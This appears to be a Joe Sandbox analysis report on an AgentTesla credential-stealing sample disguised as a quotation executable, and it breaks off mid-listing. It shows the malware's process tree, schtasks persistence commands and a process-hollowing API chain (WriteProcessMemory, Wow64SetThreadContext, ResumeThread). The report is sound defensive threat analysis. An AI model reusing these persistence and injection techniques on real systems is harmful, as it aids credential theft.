                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\rQuotation3200025006.exe"
                                      Imagebase:0x8c0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:9
                                      Start time:07:10:03
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      Imagebase:0x1c0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:07:10:10
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp"
                                      Imagebase:0x6f0000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:07:10:09
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff693ab0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:07:10:10
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:07:10:11
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                                      Imagebase:0x180000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:07:10:11
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                                      Imagebase:0xff0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:16
                                      Start time:07:10:16
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0x90000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp"
                                      Imagebase:0x6f0000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0x2f0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0xc0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0x240000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0xe80000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:07:10:24
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0x7ff70f330000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:07:10:25
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp"
                                      Imagebase:0x6f0000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:07:10:25
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:07:10:25
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0xfe0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:10.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:2.1%
                                        Total number of Nodes:143
                                        Total number of Limit Nodes:13
                                        execution_graph 28770 8ada48 DuplicateHandle 28771 8adade 28770->28771 28944 6cc59b8 28945 6cc5b43 28944->28945 28947 6cc59de 28944->28947 28947->28945 28948 6cc2d94 28947->28948 28949 6cc5c38 PostMessageW 28948->28949 28951 6cc5ca4 28949->28951 28951->28947 28772 6cc1a86 28773 6cc1a8c 28772->28773 28774 6cc1a67 28772->28774 28778 6cc4868 28773->28778 28794 6cc4863 28773->28794 28775 6cc1bff 28779 6cc4882 28778->28779 28780 6cc488a 28779->28780 28810 6cc50ac 28779->28810 28816 6cc4f12 28779->28816 28821 6cc4d7b 28779->28821 28826 6cc4d1a 28779->28826 28831 6cc4dda 28779->28831 28835 6cc4f78 28779->28835 28841 6cc4e9c 28779->28841 28849 6cc4cc7 28779->28849 28856 6cc4fe5 28779->28856 28861 6cc5449 28779->28861 28869 6cc52cf 28779->28869 28873 6cc518e 28779->28873 28881 6cc4f8e 28779->28881 28780->28775 28795 6cc4882 28794->28795 28796 6cc50ac 2 API calls 28795->28796 28797 6cc488a 28795->28797 28798 6cc4f8e 2 API calls 28795->28798 28799 6cc518e 4 API calls 28795->28799 28800 6cc52cf 2 API calls 28795->28800 28801 6cc5449 4 API calls 28795->28801 28802 6cc4fe5 2 API calls 28795->28802 28803 6cc4cc7 4 API calls 28795->28803 28804 6cc4e9c 4 API calls 28795->28804 28805 6cc4f78 2 API calls 28795->28805 28806 6cc4dda 2 API calls 28795->28806 28807 6cc4d1a 2 API calls 28795->28807 28808 6cc4d7b 2 API calls 28795->28808 28809 6cc4f12 2 API calls 28795->28809 28796->28797 28797->28775 28798->28797 28799->28797 28800->28797 28801->28797 28802->28797 28803->28797 28804->28797 28805->28797 28806->28797 28807->28797 28808->28797 28809->28797 28811 6cc5163 28810->28811 28812 6cc4d26 28810->28812 28811->28780 28812->28811 28813 6cc556d 28812->28813 28886 6cc1458 28812->28886 28890 6cc1450 28812->28890 28813->28780 28819 6cc1458 ReadProcessMemory 28816->28819 28820 6cc1450 ReadProcessMemory 28816->28820 28817 6cc4d26 28817->28816 28818 6cc5163 28817->28818 28818->28780 28819->28817 28820->28817 28822 6cc4d81 28821->28822 28823 6cc4ed1 28822->28823 28894 6cc08ab 28822->28894 28898 6cc08b0 28822->28898 28823->28780 28827 6cc4d26 28826->28827 28828 6cc5163 28827->28828 28829 6cc1458 ReadProcessMemory 28827->28829 28830 6cc1450 ReadProcessMemory 28827->28830 28828->28780 28829->28827 28830->28827 28902 6cc095b 28831->28902 28906 6cc0960 28831->28906 28832 6cc4df4 28832->28780 28836 6cc4fa5 28835->28836 28837 6cc53c8 28836->28837 28910 6cc1368 28836->28910 28914 6cc1361 28836->28914 28837->28780 28838 6cc4e2a 28838->28780 28842 6cc5199 28841->28842 28843 6cc4d92 28842->28843 28845 6cc095b Wow64SetThreadContext 28842->28845 28846 6cc0960 Wow64SetThreadContext 28842->28846 28844 6cc4ed1 28843->28844 28847 6cc08ab ResumeThread 28843->28847 28848 6cc08b0 ResumeThread 28843->28848 28844->28780 28845->28843 28846->28843 28847->28843 28848->28843 28918 6cc15e5 28849->28918 28922 6cc15f0 28849->28922 28857 6cc5008 28856->28857 28859 6cc1368 WriteProcessMemory 28857->28859 28860 6cc1361 WriteProcessMemory 28857->28860 28858 6cc526c 28858->28780 28859->28858 28860->28858 28862 6cc5452 28861->28862 28865 6cc1368 WriteProcessMemory 28862->28865 28866 6cc1361 WriteProcessMemory 28862->28866 28863 6cc4d26 28864 6cc5163 28863->28864 28867 6cc1458 ReadProcessMemory 28863->28867 28868 6cc1450 ReadProcessMemory 28863->28868 28864->28780 28865->28863 28866->28863 28867->28863 28868->28863 28926 6cc12a8 28869->28926 28930 6cc12a6 28869->28930 28870 6cc52ed 28874 6cc51a6 28873->28874 28875 6cc4d92 28873->28875 28879 6cc095b Wow64SetThreadContext 28874->28879 28880 6cc0960 Wow64SetThreadContext 28874->28880 28876 6cc4ed1 28875->28876 28877 6cc08ab ResumeThread 28875->28877 28878 6cc08b0 ResumeThread 28875->28878 28876->28780 28877->28875 28878->28875 28879->28875 28880->28875 28882 6cc4f94 28881->28882 28884 6cc1368 WriteProcessMemory 28882->28884 28885 6cc1361 WriteProcessMemory 28882->28885 28883 6cc4e2a 28883->28780 28884->28883 28885->28883 28887 6cc14a3 ReadProcessMemory 28886->28887 28889 6cc14e7 28887->28889 28889->28812 28891 6cc14a3 ReadProcessMemory 28890->28891 28893 6cc14e7 28891->28893 28893->28812 28895 6cc08f0 ResumeThread 28894->28895 28897 6cc0921 28895->28897 28897->28822 28899 6cc08f0 ResumeThread 28898->28899 28901 6cc0921 28899->28901 28901->28822 28903 6cc0960 Wow64SetThreadContext 28902->28903 28905 6cc09ed 28903->28905 28905->28832 28907 6cc09a5 Wow64SetThreadContext 28906->28907 28909 6cc09ed 28907->28909 28909->28832 28911 6cc13b0 WriteProcessMemory 28910->28911 28913 6cc1407 28911->28913 28913->28838 28915 6cc13b0 WriteProcessMemory 28914->28915 28917 6cc1407 28915->28917 28917->28838 28919 6cc1679 CreateProcessA 28918->28919 28921 6cc183b 28919->28921 28923 6cc1679 CreateProcessA 28922->28923 28925 6cc183b 28923->28925 28925->28925 28927 6cc12e8 VirtualAllocEx 28926->28927 28929 6cc1325 28927->28929 28929->28870 28931 6cc12e8 VirtualAllocEx 28930->28931 28933 6cc1325 28931->28933 28933->28870 28934 8ad800 28935 8ad846 GetCurrentProcess 28934->28935 28937 8ad898 GetCurrentThread 28935->28937 28938 8ad891 28935->28938 28939 8ad8ce 28937->28939 28940 8ad8d5 GetCurrentProcess 28937->28940 28938->28937 28939->28940 28943 8ad90b 28940->28943 28941 8ad933 GetCurrentThreadId 28942 8ad964 28941->28942 28943->28941 28952 8ab070 28953 8ab07f 28952->28953 28955 8ab159 28952->28955 28956 8ab19c 28955->28956 28957 8ab179 28955->28957 28956->28953 28957->28956 28958 8ab3a0 GetModuleHandleW 28957->28958 28959 8ab3cd 28958->28959 28959->28953

                                        Executed Functions

                                        Function 04BBB7D8 Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cdf8539364e9f96aee739d65ce1825f96787e23bc2cc16683f35b792ebbe357b
                                        • Instruction ID: 67bd8a6b2b78e56c7842d40867b650d65b45cc16a55d184d18ea1fc1a2625851
                                        • Opcode Fuzzy Hash: cdf8539364e9f96aee739d65ce1825f96787e23bc2cc16683f35b792ebbe357b
                                        • Instruction Fuzzy Hash: B521FAB0D046188FEB18CFABD9543EEBBF3AFC8300F14C06AD448A6264DB7419468F90
                                        Function 04BBB7E8 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57c197b923edb1f18a1155537d9e738680a8c57bb543499b4da92e5c8b45fb90
                                        • Instruction ID: 4a94c7eec8e28da0d8df6b57d719740392f0a19fc1a36096e135255bf61ae46c
                                        • Opcode Fuzzy Hash: 57c197b923edb1f18a1155537d9e738680a8c57bb543499b4da92e5c8b45fb90
                                        • Instruction Fuzzy Hash: 9B2198B0E056189BEB18CFABD9547EEFAF6AFC8300F14C06AD41966264EB7419458F90
                                        Function 06CC4D7B Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 322e2b198bd582d27ecfa7a6f2fbf9539e0e352a432da745f282ca001c18ac6a
                                        • Instruction ID: 2545618e90b733780cece92db38d9f72618f697e8eedd15a8242b492e31ddd9c
                                        • Opcode Fuzzy Hash: 322e2b198bd582d27ecfa7a6f2fbf9539e0e352a432da745f282ca001c18ac6a
                                        • Instruction Fuzzy Hash: FD114C39809218CFDBA4CF55D9447E8B7F8EB4A321F00A1AEC40EA3291D7346AD5CF80
                                        Function 06CC4EE4 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b17bc6dd27c6c40ac5d62316993ba4964836af4e870afda0969287cc00c0de1
                                        • Instruction ID: d90e63b93274e0f34eefb2413182e6480b86fa86070d31e483ecba05808fb7d7
                                        • Opcode Fuzzy Hash: 2b17bc6dd27c6c40ac5d62316993ba4964836af4e870afda0969287cc00c0de1
                                        • Instruction Fuzzy Hash: CDF04934C4A258CFCB94DF51E9442F8B7B8EB5A361F40A0AAD40AA3251CA346B90CF84
                                        Function 06CC4ECD Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73ca22271f6fa3d9699005bf7b8341d40fe85c76c56fff133ece3026b8105e24
                                        • Instruction ID: d4f6cbd9357a95c6822c4cd3410edcddfa2e80aae92d5d4f800b8b93b223fbe4
                                        • Opcode Fuzzy Hash: 73ca22271f6fa3d9699005bf7b8341d40fe85c76c56fff133ece3026b8105e24
                                        • Instruction Fuzzy Hash: 92F03034D5E244CFD7909F95E4444F8BBB8EB5B260F44209AD40A93222C6207AA5DB80
                                        Function 008AD7F0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 594 8ad7f0-8ad88f GetCurrentProcess 599 8ad898-8ad8cc GetCurrentThread 594->599 600 8ad891-8ad897 594->600 601 8ad8ce-8ad8d4 599->601 602 8ad8d5-8ad909 GetCurrentProcess 599->602 600->599 601->602 604 8ad90b-8ad911 602->604 605 8ad912-8ad92d call 8ad9cf 602->605 604->605 608 8ad933-8ad962 GetCurrentThreadId 605->608 609 8ad96b-8ad9cd 608->609 610 8ad964-8ad96a 608->610 610->609
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 008AD87E
                                        • GetCurrentThread.KERNEL32 ref: 008AD8BB
                                        • GetCurrentProcess.KERNEL32 ref: 008AD8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 008AD951
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 4fc80b6975ac72c84942bde01a44396e1e93d2d39dcc9e551c9a00255012b0e0
                                        • Instruction ID: 5f88ee312754a19badcecba9f246adebb63faca4c50b3a5378f1d8bd5778bdd9
                                        • Opcode Fuzzy Hash: 4fc80b6975ac72c84942bde01a44396e1e93d2d39dcc9e551c9a00255012b0e0
                                        • Instruction Fuzzy Hash: E25185B09017498FDB14CFA9C948BDEBBF0FB49314F208469E059A72A1DB749984CF66
                                        Function 008AD800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 617 8ad800-8ad88f GetCurrentProcess 621 8ad898-8ad8cc GetCurrentThread 617->621 622 8ad891-8ad897 617->622 623 8ad8ce-8ad8d4 621->623 624 8ad8d5-8ad909 GetCurrentProcess 621->624 622->621 623->624 626 8ad90b-8ad911 624->626 627 8ad912-8ad92d call 8ad9cf 624->627 626->627 630 8ad933-8ad962 GetCurrentThreadId 627->630 631 8ad96b-8ad9cd 630->631 632 8ad964-8ad96a 630->632 632->631
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 008AD87E
                                        • GetCurrentThread.KERNEL32 ref: 008AD8BB
                                        • GetCurrentProcess.KERNEL32 ref: 008AD8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 008AD951
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 92852fa0c3bfa4c5261585ca047c7bb89a7cc4e7f661e416c781b6468b3ec7c7
                                        • Instruction ID: 515e9d5143f75b36d2a0a214ef53ee7090c245c37bc8709b968dde612e91cb9b
                                        • Opcode Fuzzy Hash: 92852fa0c3bfa4c5261585ca047c7bb89a7cc4e7f661e416c781b6468b3ec7c7
                                        • Instruction Fuzzy Hash: D55165B09017098FDB14DFA9C948BDEBBF1FB48304F20C429E059A7660DB749984CF66
                                        Function 06CC15E5 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 809 6cc15e5-6cc1685 811 6cc16be-6cc16de 809->811 812 6cc1687-6cc1691 809->812 817 6cc1717-6cc1746 811->817 818 6cc16e0-6cc16ea 811->818 812->811 813 6cc1693-6cc1695 812->813 815 6cc16b8-6cc16bb 813->815 816 6cc1697-6cc16a1 813->816 815->811 819 6cc16a5-6cc16b4 816->819 820 6cc16a3 816->820 826 6cc177f-6cc1839 CreateProcessA 817->826 827 6cc1748-6cc1752 817->827 818->817 822 6cc16ec-6cc16ee 818->822 819->819 821 6cc16b6 819->821 820->819 821->815 823 6cc16f0-6cc16fa 822->823 824 6cc1711-6cc1714 822->824 828 6cc16fc 823->828 829 6cc16fe-6cc170d 823->829 824->817 840 6cc183b-6cc1841 826->840 841 6cc1842-6cc18c8 826->841 827->826 830 6cc1754-6cc1756 827->830 828->829 829->829 831 6cc170f 829->831 832 6cc1758-6cc1762 830->832 833 6cc1779-6cc177c 830->833 831->824 835 6cc1764 832->835 836 6cc1766-6cc1775 832->836 833->826 835->836 836->836 837 6cc1777 836->837 837->833 840->841 851 6cc18d8-6cc18dc 841->851 852 6cc18ca-6cc18ce 841->852 854 6cc18ec-6cc18f0 851->854 855 6cc18de-6cc18e2 851->855 852->851 853 6cc18d0 852->853 853->851 857 6cc1900-6cc1904 854->857 858 6cc18f2-6cc18f6 854->858 855->854 856 6cc18e4 855->856 856->854 860 6cc1916-6cc191d 857->860 861 6cc1906-6cc190c 857->861 858->857 859 6cc18f8 858->859 859->857 862 6cc191f-6cc192e 860->862 863 6cc1934 860->863 861->860 862->863 865 6cc1935 863->865 865->865
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CC1826
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 72920688e529508a4dae90120535602ee94f3f949df143e71dceda5ada3c22fc
                                        • Instruction ID: 452aaff8ec0239b090ab0bd7c97a9ec3607f476c7f9f24fec2c5d8234da74141
                                        • Opcode Fuzzy Hash: 72920688e529508a4dae90120535602ee94f3f949df143e71dceda5ada3c22fc
                                        • Instruction Fuzzy Hash: E8A17B70D00619CFEB50CF69C841BDDBBB2EF44320F1885AAE848A7641DB749A85CF91
                                        Function 06CC15F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
